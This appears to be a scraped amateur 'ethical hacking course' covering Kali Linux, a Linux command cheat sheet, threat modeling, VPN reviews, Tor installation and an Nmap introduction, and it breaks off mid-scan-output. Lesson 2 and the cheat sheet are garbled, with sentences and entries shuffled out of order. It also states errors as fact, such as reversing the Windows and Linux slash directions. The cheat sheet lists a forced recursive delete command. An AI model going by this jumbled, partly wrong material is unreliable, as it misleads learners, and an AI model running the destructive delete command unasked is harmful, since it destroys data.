Ethical Hacking Course From KYAnonymous



Comments



Description

Lesson 1: Introduction to Kali LinuxKali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution. Kali Linux is preinstalled with numerous penetration-testing programs, including nmap (a port scanner), Wireshark (a packet analyzer), John the Ripper (a password cracker), Aircrack-ng (a software suite for penetration-testing wireless LANs), Burp suite and OWASP ZAP (both web application security scanners). Kali Linux can run natively when installed on a computer’s hard disk, can be booted from a live CD or live USB, or it can run within a virtual machine. It is a supported platform of the Metasploit Project’s Metasploit Framework, a tool for developing and executing security exploits. Introduction to Kali Linux :From kali website: Kali Linux is an advanced Penetration Testing and Security Auditing Linux distribution. Kali Linux Features Kali is a complete re-build of BackTrack Linux, adhering completely to Debian development standards. All-new infrastructure has been put in place, all tools were reviewed and packaged, and we use Git for our VCS. More than 300 penetration testing tools: After reviewing every tool that was included in BackTrack, we eliminated a great number of tools that either did not work or had other tools available that provided similar functionality. Free and always will be: Kali Linux, like its predecessor, is completely free and always will be. You will never, ever have to pay for Kali Linux. Open source Git tree: We are huge proponents of open source software and our development tree is available for all to see and all sources are available for those who wish to tweak and rebuild packages. FHS compliant: Kali has been developed to adhere to the Filesystem Hierarchy Standard, allowing all Linux users to easily locate binaries, support files, libraries, etc. Vast wireless device support: We have built Kali Linux to support as many wireless devices as we possibly can, allowing it to run properly on a wide variety of hardware and making it compatible with numerous USB and other wireless devices. Custom kernel patched for injection: As penetration testers, the development team often needs to do wireless assessments so our kernel has the latest injection patches included. Secure development environment: The Kali Linux team is made up of a small group of trusted individuals who can only commit packages and interact with the repositories while using multiple secure protocols. GPG signed packages and repos: All Kali packages are signed by each individual developer when they are built and committed and the repositories subsequently sign the packages as well. Multi-language: Although pentesting tools tend to be written in English, we have ensured that Kali has true multilingual support, allowing more users to operate in their native language and locate the tools they need for the job. Completely customizable: ARMEL and ARMHF support: Since ARM-based systems are becoming more and more prevalent and inexpensive, we knew that Kali’s ARM support would need to be as robust as we could manage, resulting in working installations for both ARMEL and ARMHF systems. Kali Linux has ARM repositories integrated with the mainline distribution so tools for ARM will be updated in conjunction with the rest of the distribution. Kali is currently available for the following ARM devices: - rk3306 mk/ss808 - Raspberry Pi - ODROID U2/X2 - Samsung Chromebook - EfikaMX - Beaglebone Black - CuBox - Galaxy Note 10.1 .................. Okay class, its important to realize that most of the commands in kali are GUI or graphic user interface unlike previous installations of backtrack which require terminal input. Terminal is like windows command prompt, with a derivative you will be quick to notice, in file paths in windows the slash is forwards \ In the linux enviroment, the slash is backwards / ***Important*** Filepaths are case sensitive and when launching a program you also have to type the extension. Ex. Root/user/admin/torhammer.py If you had the above program installed, the extension being ".py" would launch the program. Another cool thing about kali, and linux period, is if and when you learn a programming language, you can code your own programs in their "notepad" style program and save it as something like "hacklikeaboss.py" and it will save as a python file, then right click and change advanced settings to executable file andddddd voila! Your very own custom program has been created. Enough about kali, im sure youre ready to get started on lesson 2 Lesson 2 : Real World applications for kali, forming your own business, and introduction to terminal, the hacker's best friend. so a tutorial in sudo isnt necessary. and even college databases being breached can not only raise awareness. and even credit card transaction information. Thousands of people either own their own business or work from home. A Kali Linux application for this would be a tool called wpscan. This consumes a good portion of time for the client. Everytime you start kali. and access things like customer data. Incorperating them into your repertoire as a sales pitch is crucial to forming a thriving business model that will generate revenue for you and your company. and in todays day and age everyone is digital. always get permission. Kali is already preconfigured to run root access. You will find when launching these programs via the drop down menu that they launch a sort of command prompt via a program called terminal. Ever heard the term a little fear is healthy? Well fear sells. These are businesses that you will start with at first to build a reputation. but also raise the fear factor. they could not only lose their investment. Stressing the importance of Data Security to the customer is an integral part of the sales pitch. which we will review later on. Its illegal to scan without permission. even blog on them daily about events. if its a live disk and not a full install. and if someone were to access that because they had a faulty line of code in their site. Some people run their business sites via wordpress. but it scans the site for vulnerabilities allowing you to report them to the sitemaster or admin. Terminal accepts your commands and runs basically every function on kali and this is where you will spend most of your time. i recommend opening up a terminal first thing Then type apt-get update This updates the files You can also search for upgraded software apt-get upgrade .Lesson 2: Real World Applications for Kali Linux Greetings class: Real world applications for Kali Linux are very diverse. but lose customers and customer data as well. Another tool to use would be nmap This tool scans open ports on wifi connections Open ports are like open doors that anyone with the right knowledge can access. Looking up articles about local businesses around your area. Small business examples: Every 9 seconds a personal computer is hacked. > man. similar to exit Learn the Commands apropos subject – List manual pages for subject man -k keyword – Display man pages containing keyword man command – Show the manual for command man -t man | ps2pdf . resume with fg in the foreground or bg in the background Ctrl + C – Halts the current command. (a period) – Insert the last argument of the previous command on the fly.pdf – Make a pdf of a manual page which command – Show full path name of command time command – See how long a command takes whereis app – Show possible locations of app which app – Show which app will be run by default. which enables you to edit it before executing the command Ctrl + A – Return to the start of the command you're typing Ctrl + E – Go to the end of the command you're typing Ctrl + U – Cut everything before the cursor to a special clipboard. erases the whole line Ctrl + K – Cut everything after the cursor to a special clipboard Ctrl + Y – Paste from the special clipboard that Ctrl + U and Ctrl + K save their data to Ctrl + T – Swap the two characters before the cursor (you can actually use this to transport a character from the left to the right. try it!) Ctrl + W – Delete the word / argument left of the cursor in the current line Ctrl + D – Log out of current session. it shows the full path . cancel the current operation and/or start with a fresh new line Ctrl + L – Clear the screen command | less – Allows the scrolling of the bash command window using Shift + Up Arrowand Shift + Down Arrow !! – Repeats the last command command !$ – Repeats the last argument of the previous command Esc + .Other commands are listed below System Info date – Show the current date and time cal – Show this month's calendar uptime – Show current uptime w – Display who is online whoami – Who you are logged in as finger user – Display information about user uname -a – Show kernel information cat /proc/cpuinfo – CPU information cat /proc/meminfo – Memory information df -h – Show disk usage du – Show directory space usage free – Show memory and swap usage Keyboard Shortcuts Enter – Run the command Up Arrow – Show the previous command Ctrl + R – Allows you to type a part of the command you're looking for and finds it Ctrl + Z – Stops the current command. create dir2 if it doesn't exist cp file /home/dirname – Copy the filename called file to the /home/dirname directory mv file /home/dirname – Move the file called filename to the /home/dirname directory mv file1 file2 – Rename or move file1 to file2. and world by adding: 4 – read (r). write. group. rx for group and world For more options. execute for all chmod 755 – rwx for owner.2 – write (w). this assumes you have already used the command updatedb (see next) updatedb – Create or update the database of files on all file systems attached to the Linux root directory which filename – Show the subdirectory containing the executable file called filename grep TextStringToFind /dir – Starting with the directory called dir. look for the file containing the string filename locate filename – Find a file called filename using the locate command. 1 – execute (x) Examples: chmod 777 – read. which can be found separately for user. moves file1 into directory file2 ln -s file link – Create symbolic link link to file touch file – Create or update file cat > file – Places standard input into file cat file – Display the file called file . look for the file called filename find / -name ”*filename*” – Starting with the root directory.Searching grep pattern files – Search for pattern in files grep -r pattern dir – Search recursively for pattern in dir command | grep pattern – Search for pattern in the output of command locate file – Find all instances of file find / -name filename – Starting with the root directory. see man chmod. look for and list all files containing TextStringToFind File Permissions chmod octal file – Change the permissions of file to octal. File Commands ls – Directory listing ls -l – List files in current directory using long format ls -laC – List all files in current directory in long format and display in columns ls -F – List files in current directory and indicate the file type ls -al – Formatted listing with hidden files cd dir – Change directory to dir cd – Change to home mkdir dir – Create a directory dir pwd – Show current directory rm name – Remove a file or directory called name rm -r dir – Delete directory dir rm -f file – Force remove file rm -rf dir – Force remove an entire directory dir and all it’s included files and subdirectories (use with extreme caution) cp file1 file2 – Copy file1 to file2 cp -r dir1 dir2 – Copy dir1 to dir2. if file2 is an existing directory. tar – Extract the files from file.more file – Display the file called file one page at a time.tar containing files tar xf file. proceed to next page using the spacebar head file – Output the first 10 lines of file head -20 file – Display the first 20 lines of the file called file tail file – Output the last 10 lines of file tail -20 file – Display the last 20 lines of the file called file tail -f file – Output the contents of file as it grows.d/init.gz – Extract a tar using Gzip tar cjf file.d/init.bz2 – Create a tar with Bzip2 compression tar xjf file.tar. starting with the last 10 lines Compression tar cf file.gz – Decompresses file.d/lpd stop – Stop the print daemon /etc/rc.tar files – Create a tar named file.d/init.d/lpd status – Display status of the print daemon lpq – Display jobs in print queue lprm – Remove jobs from queue lpr – Print a file lpc – Printer control tool man subject | lpr – Print the manual page called subject as plain text man -t subject | lpr – Print the manual page called subject as Postscript output printtool – Start X printer setup interface Network ifconfig – List IP addresses for all devices on the local machine iwconfig – Used to set the parameters of the network interface which are specific to the wireless operation (for example: the frequency) iwlist – used to display some additional information from a wireless network interface that is not displayed by iwconfig ping host – Ping host and output results whois domain – Get whois information for domain dig domain – Get DNS information for domain dig -x host – Reverse lookup host wget file – Download file wget -c file – Continue a stopped download SSH ssh user@host – Connect to host as user ssh -p port user@host – Connect to host on port port as user ssh-copy-id user@host – Add your key to host for user to enable a keyed or passwordless login User Administration .gz files – Create a tar with Gzip compression tar xzf file.gz gzip -d file.tar tar czf file.bz2 – Extract a tar using Bzip2 gzip file – Compresses file and renames it to file.tar.d/lpd start – Start the print daemon /etc/rc.gz back to file Printing /etc/rc.tar.tar. same as above startx – Start the X system .deb – install a DEB package (Debian / Ubuntu / Linux Mint) rpm -Uvh pkg.rpm – install a RPM package (Red Hat / Fedora) Stopping & Starting shutdown -h now – Shutdown the system now and do not reboot halt – Stop all processes .same as above shutdown -r 5 – Shutdown the system in 5 minutes and reboot shutdown -r now – Shutdown the system now and reboot reboot – Stop all processes and then reboot . resume a stopped job in the background fg – Brings the most recent job to foreground fg n – Brings job n to the foreground Installation from source ./configure make make install dpkg -i pkg.adduser accountname – Create a new user call accountname passwd accountname – Give accountname a new password su – Log in as superuser from current login exit – Stop being superuser and revert to normal user Process Management ps – Display your currently active processes top – Display all running processes kill pid – Kill process id pid killall proc – Kill all processes named proc (use with extreme caution) bg – Lists stopped or background jobs. and whom you’re working with. Fear sells. and what stops others from accessing it. 100 percent of the time. In order to answer the second question. you must determine what you need to protect. there are five main questions you should ask yourself: What do you want to protect?Who do you want to protect it from?How likely is it that you will need to protect it?How bad are the consequences if you fail?How much trouble are you willing to go through in order to try to prevent those? When we talk about the first question. . who has access to it. You ask them and they say they are running sql databases. “Who do you want to protect it from. Digital security isn’t about which tools you use. contact lists. where it’s kept. and files are all assets. It's this fear that drives us to protect ourselves against the unknown. Now for a little roleplay. you should conduct a threat modeling assessment. today's lesson will be on threat assessment. Your devices are also assets. rather. Modeling There is no single solution for keeping yourself safe online. or who is your adversary. Write down a list of data that you keep. Examples of potential adversaries are your boss. An adversary is any person or entity that poses a threat against an asset or assets. I hope you have had time to experiment with terminal commands and familiarize yourelves with the file structure of Kali Linux. storing customer information on encrypted servers. and has an option for member sign up. your emails. An assett is something you value and want to protect. in short. we often refer to assets. It's this fear that tells us money isn't a factor when it comes to protecting our investments. or the things that you are trying to protect. For example. it’s about understanding the threats you face and how you can counter those threats. Threats can change depending on where you’re located. When conducting an assessment. To become more secure. Company xyz is a fortune 500 company. processing credit cars and bank transactions. Therefore. How would you approach the company to sell your business? Respond to this email with your answer. the assets in question are usually information.” it’s important to understand who might want to target you or your information.Lesson 3: Threat assessment and how to sell it Good morning class. who buys and trades domains on the market. your government. what you’re doing. and whom you need to protect it from. or a hacker on a public network. When we are talking about digital security. So. instant messages. My answer will be included in lesson 4 Now on threat assessment. in order to determine what solutions will be best for you. In a military context. as do their attacks.Make a list of who might want to get ahold of your data or communications. A hacker on an open Wi-Fi network can access your unencrypted communications. Conducting a risk analysis is both a personal and a subjective process.What is the actual risk of someone breaking in? Is it likely? Once you have asked yourself these questions. your mobile phone provider has access to all of your phone records and therefore has the capability to use that data against you. you are in a position to assess what measures to take. an adversary can read your private communications as they pass through the network. but the risk of this happening is far greater in San Francisco (where earthquakes are common) than in Stockholm (where they are not). If you want to keep your house and possessions safe. A threat is something bad that can happen to an asset. A government trying to prevent the spread of a video showing police violence may be content to simply delete or reduce the availability of that video. There are numerous ways that an adversary can threaten your data. because the mere presence of the threat at any likelihood is not worth the cost. a government agency. It might be an individual. risk is the likelihood that the threat will occur. but the risk of a break-in is low. in many civilian contexts. Now. While a threat is a bad thing that can happen. here are a few questions you might ask: Should I lock my door?What kind of lock or locks should I invest in?Do I need a more advanced security system?What are the assets in this scenario?The privacy of my homeThe items inside my homeWhat is the threat?Someone could break in. or a corporation. While your mobile phone provider has the capability to access all of your data. The capability of your attacker is also an important thing to think about. if the risk is high. there is a threat that your building might collapse. It is important to distinguish between threats and risks. In other cases. the risk of them posting your private data online to harm your reputation is low. and goes hand-in-hand with capability. Risk is the likelihood that a particular threat against a particular asset will actually occur. For example. The motives of adversaries differ widely. people disregard high risks because they don't view the threat as a problem. then you probably won’t want to invest too much money in a lock. Write down what your adversary might want to do with your private data. An adversary could also disable your access to your own data. not everyone has the same priorities or views threats in the same way. For example. Your government might have stronger capabilities. A final thing to consider is risk. or they can delete or corrupt your data. it's more important for an asset such as email service to be available than confidential. If your possessions are valuable. whereas a political opponent may wish to gain access to secret content and publish it without you knowing. and perhaps even add a security system. On the other hand. it might be preferable for an asset to be destroyed than for it to fall into enemy hands. Conversely. for example. you’ll want to get the best locks on the market. Many people find certain threats unacceptable no matter what the risk. let’s practice threat modeling. . For instance. You can then do things like access file servers. A VPN can be thought to create a "tunnel" through the public network to your private network at the other end. and other services you might not have access to outside of your work network. video chat. So when you're travelling overseas you can still view websites you would normally use at home. etc. email. Otherwise it is relatively easy for other people to view your network traffic. and access other services. movie and music streaming websites. and games will not work. and a VPN provides a way to still maintain access to the services you would normally use.) and wireless networks knowing your network traffic is kept safe and secure. Access Location Restricted Content: By connecting to a VPN server in another location you can make it appear to websites using geolocation that you are physically in the correct location for access. Viscosity even allows you to tunnel through a HTTP or SOCKS proxies to establish your VPN connection. This allows you to use public networks (such as at hotels. VPN. Bypass Restrictive Networks: Some networks may restrict access to the web services that can be accessed. view iTunes shares. meaning that many applications like VOIP. or one provided by a commercial VPN service. If you are hired to test the security already in place. Opsec is essential as to not let your opponent know that you are on to them. What Does A VPN Let Me Do? A VPN allows you to do a number of things you wouldn't otherwise be able to do connected to a standard network. take remote control of your computer. Access Your Workplace Remotely: You can connect to your workplace's VPN and have access as if you were physically in the office. Opsec stands for "operational security" and is a term coined by the special forces in the United States military. This includes: Network Security & Privacy: All network traffic through your VPN connection is kept secure. computers. such as see what you are viewing. such as television. All network traffic through this tunnel is encrypted to ensure it is kept secure and private. This remote network is typically a private network. However using a VPN you can tunnel through such restrictions and allow all of your network applications to work. Access Your Home Network: Connecting back home using a VPN allows you to access your computers remotely. Why Should I Use A VPN? . Some countries impose censorship on Internet access while in that country. such as a workplace or home network.Lesson 4: Opsec. Tor. databases. steal your information and login details. coffee shops. instant messenging. etc. When it comes to hacking. internal webpages. Escape Censorship: VPNs allow you to bypass restrictive censorship and access websites and services that would otherwise be blocked. Access files on your computer. Virtual Private Networks or VPNs: What Is A VPN? A VPN (Virtual Private Network) provides a secure way of connecting through a public network (such as the Internet) to a remote network/location. conferences. it would be obvious that you would need to learn ways to mask your attacks. VPN Service Providers There are many companies that specialize in providing a commercial VPN service. allowing you to not only get the security and privacy benefits on a VPN. Public networks. Like IPSec and PPTP.Even if you have no desire to be able to access a private network remotely. It is installed on the user's computer and communicates with the VPN server to create a secure link for the user's network traffic. How Does A VPN Work? A typical VPN consists of two components: the VPN client and the VPN server. A VPN server will also perform authentication to ensure only registered users can connect to the VPN. All network traffic through the tunnel created between the VPN client and the VPN server is encrypted to keep it private and secure. 1) do they cooperate with united states gov subpoenas 2 do they keep logs (you dont want logs) TorGuard TorGuard's claim to fame is that they offer specific types of servers for different activities. provide an easy way for hackers and malicious users to listen in ("sniff") on your network usage. and in particular public wireless networks. In addition. steal session information to be able to log into sites as you. and compatibility with most network environments. making it secure and private. OpenVPN handles the connection between the VPN client and server. A VPN client is the software that allows a user to connect their computer to the VPN server and establish the VPN connection. This allows them to not only monitor in depth your network traffic. a VPN is vital to ensure the security and privacy of your network traffic. What Is OpenVPN? OpenVPN is a popular VPN protocol that is based on SSL/TLS encryption. Most VPN Service Providers charge a small monthly or yearly fee for access to their servers. but also alter your traffic or inject their own in an attempt to fool a user into revealing important data. OpenVPN is rapidly gaining in popularity thanks to its high level of security. Viscosity performs the duties of a VPN client. however there are also a number of free service providers. skilled hackers may perform a "man in the middle" attack. These companies are known as "VPN Service Providers". The VPN Client is what the end user uses to control their VPN connection. and extract other private data. A VPN server is setup at the location users want to connect to. End users rarely have to interact with the VPN Server. The key to choosing a quality vpn comes down to two factors. as your network traffic is authenticated and encrypted. but also making it easy to access websites that restrict access to certain counties. That gives you the ability to connect to torrent-friendly services if you need to download something. A VPN Server usually configured and maintained by IT staff. VPN Service Providers often have servers in multiple countries. customizability. however home users often set up their own VPN personal VPN server at home or at a remote location as well. This may allow them to see what web pages you are viewing. such as at a workplace or at home. steal username and passwords. Using a VPN protects you from such attacks. encryption and anonymity- . How they manage to do it is impressive. and even offer their customers encrypted. TorGuard has different plans for you. and they have less expensive plans if you just want an anonymous proxy or a torrent proxy. They offer free and paid subscription plans. Their full VPN service however features over 200 exit servers in 18 countries. usually used by corporate networks. Like any good. They're also one of the few VPN service providers to take DNS leaking seriously. and only log a few things.) IPVanish earned high praise in the call for contenders thread for its speed while connected. Accounts with IPVanish are$10/mo or $78/yr. They support OS X. or specific "agencies. and improved security from the ground up. They use shared IP addresses. They do retain some information. Torrentfreak gave them the nod as well. Those of you who praised TorGuard in the call for contenders thread noted that they have "Stealth" VPN servers to protect you against deep packet inspection (a technique used to capture and systematically decrypt or inspect encrypted data. still impressive for a free service). The service proudly notes that they're happy with you streaming video or music while you're connected to get around pesky content blocks. they mean it.0000 IPs to share on over a hundred exit servers in 47 different countries. help you get connected via your home network. They also support multiple connectivity protocols. don't monitor your activities. but not much. university networks. but the service manages to hold itself to a high standard of privacy and security while giving you breakneck speeds that you may not be accustomed to with a VPN. their full VPN service will set you back $10/mo or $60/yr. so if you just need a little security on the go. they made a great showing in the call for contenders thread. no logging or data retention of any kind.") You also noted that they support OpenVPN. They offer your choice of exit servers in 23 different countries (free users can pick from one of 14.friendly servers if you just need a little privacy and security. especially if you're an expat who's currently abroad but wishes they could see their favorite TV shows back home or make use of their streaming music subscription. and they offer configuration utilities so you can set you home router to connect to them as well. and you cansee server status at any time . they both encrypt all of the data that passes through your connection and anonymize your location. They feature multiple connection protocols. along with iOS and Android. and Ubuntu (although it wouldn't be too hard to stretch that to other distributions). and you can connect two devices at once (as long as they're using different protocols. The service just went through a massive overhaul about a year ago. and have great customer service. They delivered a really great response to Torrentfreak's questions that's well worth a read for more info. you may be able to get away with a free account. trustworthy VPN provider. which again is perfect for getting around location restrictions. You can choose where you'd prefer to connect. Depending on your usage habits and patterns. Windows. and they don't monitor what you're doing while you're connected. That doesn't mean they're compromising security though—they have over 14. CyberGhost doesn't log any traffic. so when they say no one has any idea what you're doing when you're connected. IPVanish VPN IPVanish takes an interesting approach to privacy and security. For our purposes though. offshore email service if you want to take advantage. support for virtually every desktop and mobile OS. and their network is set up in a way that they actually have no information to collect on their user activities—they don't know what you're doing or when you're connected. CyberGhost VPN CyberGhost has been around for a long time. where they removed traffic and bandwidth restrictions for free accounts. and so on. and their encryption makes sure your traffic is safe from prying eyes. don't discriminate against traffic types or port usage. and they even offer their own test to make sure that your VPN—even if you don't use them—isn't leaking DNS and thus information you thought was secure. We have more than a few honorable mentions this week. The feature set and the face of the company both look good. and they're improving their service all the time. Of course. it just takes the skill and knowhow to do it. and they have no idea when you're connected. they have a history of logging user data. protocols. If you're looking to walk the line between a truly DIY option and a VPN that you roll at home. support virtually every mobile and desktop platforms. who are constantly working to improve and update their service to help you get around regional restrictions and blocks—-and recently unveiled a browser add-on to tunnel some services but not others. Those of you who praised the service noted their great connection speeds.) The only major difference between free and pro CyberGhost accounts is that free accounts disconnect after 3 hours.000 licenses to users in Turkey to get around their location-blocks. Similarly. They did very well in the call for contenders thread—although many of their votes were from first-time accounts—and they certainly talk the talk on privacy issues. and they combine Usenet with VPN services which is great.Their clients are easy to use. while pro accounts can use other connection protoctols and have way more servers in more countries to choose from. You'll pay $7/mo or $40/yr for a premium account. andthis Reddit thread is rather illuminating as well. no list of great options would be complete with the DIY approach. you'll be all set. strong encryption. Do-It-Yourself Of course. you'll need to step up to Premium Plus. configure. Read more in the nomination thread here. You can use VyprVPN as a stand-alone VPN client. and more for up to 90 days. giving you even more control over your connection. open-source tools. and they don't log. advanced users can fire up a VPN on their preferred host or VPS provider and keep their VPN running there while they connect to it when necessary. The sky's the limit with the DIY option. wealth of servers to choose from (even for free users). However. this setup is best for people traveling who want to encrypt their data while they're on the go. but if you need more than one device connected at any given time. a popular pick that packs in way more features than you might possibly need. pick and choose exit services in multiple countries. don't discriminate against protocols. cagey with me when I last spoke to a rep from the company. Still. but you'll sign up for Giganews when you get it. and then connect to externally. you can roll yout own VPN with OpenVPN or a number of other free. Hideman VPN. and are limited to the official client. which was a really tough call. and even generate an OpenVPN config through their wizard to connect your home network to their service all the time—oh. the Usenet service provider. sometimes a lot of user data. If you don't need exit servers in different countries. They have multiple exit servers in multiple countries. it's easy to set up a mesh network that would get you around content restrictions and port blocks. and they don't discriminate against traffic types. but with a couple of friends. for their cross-platform. but we don't feel comfortable calling them one of the best if we can't verify their commitment to your privacy and anonymity as well as the security of your data. no-logging VPN service—complete with free VPN options for people just looking for a little security on the go without shelling out for a premium service. the DD-WRT or Tomato firmwares do. and some compromise on the level of features and tools you get. The beauty of a home-rolled VPN is that you get to set the level of encryption. That's not an issue if you don't care about logging. they're worth a look. We'll also give the nod to AirVPN. and even if they don't. and at the very least log user sessions and data for troubleshooting. but they were cagey with Torrentfreak back in 2011on the topic. you get complete control over who connects and who has access to what parts of your home network. including one of my personal favorites. We should also highlight VyprVPN. and where your data goes from there. A final note—something we mentioned when we talked —don't fall into the geography trap. assuming that an overseas VPN or one outside your country is somehow safer or more committed to privacy than ones based in . mobile-friendly. Many of the best routers on the market support OpenVPN out of the box. or IP addresses (in fact. there are signs thatthings may be changing with VyprVPN. they just donated 10. so if you can install those on your router. acceptable use issues. You can forward remote ports. VyprVPN is owned by the same company that owns Giganews. Also noteworthy are the great people over at Tunnelbear. and your primary need is to encrypt and secure your data when you're away from home. at $11/mo and $70/yr. A local VPN that doesn't keep logs and has none to turn over is more trustworthy than an overseas VPN that logs everything and is happy to turn your data over to anyone who asks—and there are definitely VPN providers that fall in both categories .your own or subject to your own laws. The powerful Tor Browser Bundle." states the Tor project team. i. an anonymous web browser developed by the Tor Project.0.0.15Update HTTPS-Everywhere to 4. However. privacy and security of online users on the Internet. with a few number of new features: Updated to Firefox to 31. Tor Browser Bundle 4. received some updates in its software. late last year we have seen large scale cyber attack on Tor network that quietly seized some of its network specialized servers called Directory Authorities (DA).4. has announced the launch of its next version of Tor Browser Bundle.0. the new Tor version 4. The addition of high-capacity Tor middle relays to the Tor network helps reduce finite number of Tor connections occurring at the same time.4 also include some bugfixes:Bug 14203: Prevent meek from displaying an extra update notificationBug 14849: Remove new NoScript menu option to make permissions permanentBug 14851: Set NoScript pref to disable permanent permissions "A new release for the stable Tor Browser is available from the Tor Browser Project page and also from our distribution directory.1lUpdate NoScript to 2. On the other end of the side.3 BUG FIXES Meanwhile. NEW FEATURES The latest version.0esr with important security updates.4. Tor is generally thought to be a place where users come online to hide their activities and remain anonymous. the Tor Project and the Center of Democracy and Technology — in order to help build more privacy controls into technology.5.e.Update OpenSSL to 1. Tor is an encrypted anonymizing network considered to be one of the most privacy oriented service and is mostly used by activists. NoScript and HTTPS-Everywhere.Tor — a privacy oriented encrypted anonymizing service. the servers that help Tor clients to find Tor relays in the anonymous network service. . last month 12 high-capacity Tor Middle relays was launched by the Polaris — a new initiative by Mozilla. has been recently released.6.0. mostly supposed to improve the built-in utilities. Tor version 4. The anonymity suite also includes 3 Firefox extensions: Torbutton. journalists to circumvent online censorship and surveillance efforts by various countries. Tor Browser helps users to browse the Internet in a complete anonymous way.9. Tor Browser Bundle is basically an Internet browser based on Mozilla Firefox configured to protect the users’ anonymity via Tor and Vidalia.0. So we are going to use “Wheezy” as our distribution. You can install Tor by following any of these options: Option #1: Install Tor from Kali Repository Tor is available in Kali repository. Option #2: Install Tor from Debian Wheezy Repository If you can’t install Tor using the first method then you may try this option. to install it directly from the repository open your Terminal and type this: apt-get install tor If no error occurs. follow the second step.Installing Tor in Kali Linux: Step 1: Getting tor service ready There are 3 ways of installing Tor service in Kali Linux.list file Lets add the distribution in the list by opening the sources. Not to be confused. Kali is actually based on Debian and it uses the package management from “Wheezy”.org/torproject.net --recv 886DDD89 gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add - Step #3: Update package lists . In this way we are going to add the official Tor repository according to our Debian distribution. Now open your terminal and follow these steps: Step #1: Add repo to sources. deb http://deb.list file leafpad /etc/apt/sources.list Now add the following line at the bottom of the file.torproject.org wheezy main Step #2: Add GPG Keys Now we need to add the gpg key used to sign the packages by running the following commands: gpg --keyserver keys.gnupg. org/torproject.list You need to add a different set of lines to your /etc/apt/sources.org-keyring Step #5: Install Tor from Debian repository Finally.wheezy main Step #2: Add GPG keys. Note: This release will provide you more features but it contains bugs too.org tor- experimental-0. . keyring and install Tor Then run the following commands at your command prompt: gpg --keyserver keys. follow the second step. Step #1: Add Tor project repository to sources.torproject.net --recv 886DDD89 gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add .torproject.2.org-keyring Now Tor should be installed! If no error occurs.x.torproject. apt-get install tor Now Tor should be installed! If no error occurs. follow the second step.apt-get update apt-get install tor deb. apt-get install deb.gnupg.torproject.list file: deb http://deb. Option #3: Install Tor from development branch If you are an advanced user and you want to install Tor using the development branch then this method is for you.org wheezy main debhttp://deb.org/torproject. before installing the Tor we must add the signing key.5.Lets refresh our sources: apt-get update Step #4: Install singing keys Now. Note: Do not unpack or run TBB as root.torproject.gz (where LANG is the language listed in the filename). To run the Tor Browser Bundle.25-15-dev-LANG.tar. Once that’s done. cd ~/debian-packages apt-get source tor cd tor-* debuild -rfakeroot -uc -us cd . it will launch Firefox.en Download the architecture-appropriate file above.org wheezy main deb-srchttp://deb. switch to the Tor browser directory by running: cd tor-browser_LANG (whereLANG is the language listed in the filename).org/projects/torbrowser.deb Step #2: Downloading and Running Tor bundle Download the Tor Bundle from here.25-16-dev-LANG.torproject.list. deb-src http://deb.3.html.Option #4: Build and Install Tor from sources If you want to build your own debs from source you must first add an appropriate deb-srcline to sources./start-tor-browser This will launch Vidalia and once that connects to Tor.torproject. https://www.org/torproject.5. it doesn’t make any differences) .tar. then run one of the following two commands to extract the package archive: tar -xvzf tor-browser-gnu-linux-i686-2. execute the start-tor-browser script: .org wheezy main deb- srchttp://deb.org/torproject.3.org tor- experimental-0.gz or (for the 64-bit version): tar -xvzf tor-browser-gnu-linux-x86_64-2.x--wheezy main You also need to install the necessary packages to build your own debs and the packages needed to build Tor: apt-get install build-essential fakeroot devscripts apt-get build-dep tor Then you can build Tor in ~/debian-packages: mkdir ~/debian-packages. Now you can install the new package: dpkg -i tor_*.. (though in Kali Linux.torproject.2. save it somewhere.org/torproject. especially for identifying open ports subject to attacks and infiltration. Fortunately Felix emerged from adolescence without a criminal record. This section includes examples of Nmap used in (mostly) fictional yet typical circumstances. what services (application name and version) those hosts are offering. AO quickly hired the security consultants. security. Nevertheless. This reconnaissance stage determines what IP address ranges the target is using. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network. source code auditing. Unix. and phone systems. what operating systems (and OS versions) they are running. The first step in a vulnerability assessment is network discovery. what hosts are available. but works fine against single hosts. So Felix was not disappointed when his boss interrupted his antenna soldering to announce that the sales department closed a pen-testing deal with the Avatar Online gaming company. . what services those hosts are offering. and both console and graphical versions are available. and Felix was almost swept up in the 1990 Operation Sundevil prosecutions. he is able to perform the same types of network intrusions as before. After witnessing the high-profile leak of Valve Software's upcoming game source code. Nmap (“Network Mapper”) is a free and open source utility for network exploration and security auditing. is fascinating but still highly confidential. The small San Francisco penetration-testing firm he works for has been quiet lately due to impending holidays.Lesson 5: Introduction to NMap Nmap is a very useful tool. This is simply a broad overview of features that are described in depth in later chapters. As a professional. It was designed to rapidly scan large networks. and what firewall/filtering policies are in effect. Hacking has been his hobby and fascination since a childhood spent learning everything he could about networking. and copyright. An important legal section helps users avoid (or at least be aware of) controversial usage that could lead to ISP account cancellation or even civil and criminal charges. and so forth. Avatar Online Felix dutifully arrives at work on December 15th. and dozens of other characteristics. Nmap Overview and Demonstration Sometimes the best way to understand something is to see it in action. social engineering. Avatar Online (AO) is a small company working to create the next generation of massive multi-player online role-playing games (MMORPGs). Felix's task is to initiate an external (from outside the firewall) vulnerability assessment while his partners work on physical security. Their product. It also discusses the risks of crashing remote machines as well as miscellaneous issues such as the open source Nmap license (based on the GNU GPL). The “solutions” included throughout this book demonstrate many other common Nmap tasks for security auditors and network administrators. inspired by the Metaverse envisioned in Neil Stevenson's Snow Crash. although he does not expect many structured tasks. Nmap newbies should not expect to understand everything at once. but with the added benefit of contractual immunity from prosecution and even a paycheck! Rather than keeping his creative exploits secret. managing service upgrade schedules. This chapter uses fictional stories to provide a broad overview of Nmap and how it is typically used. Felix spends business hours pursuing his latest hobby of building powerful Wi-Fi antennas for wireless assessments and war driving exploration. its GUI is user friendly and boasts a wide variety of features. what type of packet filters/firewalls are in use. Felix is permitted to exploit any vulnerabilities found. he can brag about them to client management when presenting his reports. while retaining his expert knowledge of security weaknesses. Nmap runs on all major computer operating systems. general network topology details. and monitoring host or service uptime. Occasionally his curiosity took him too far. Felix is hoping for more business. Many systems and network administrators also find it useful for tasks such as network inventory. 209.com (6. DNS queries and zone transfer attempts.209.24.23) .122) .0/24 and their production/DMZ systems residing on 6.avataronline..com (6.com (6.0.0. Nmap scan report for dhcp-21..2) Nmap scan report for 6.207.5 Nmap scan report for 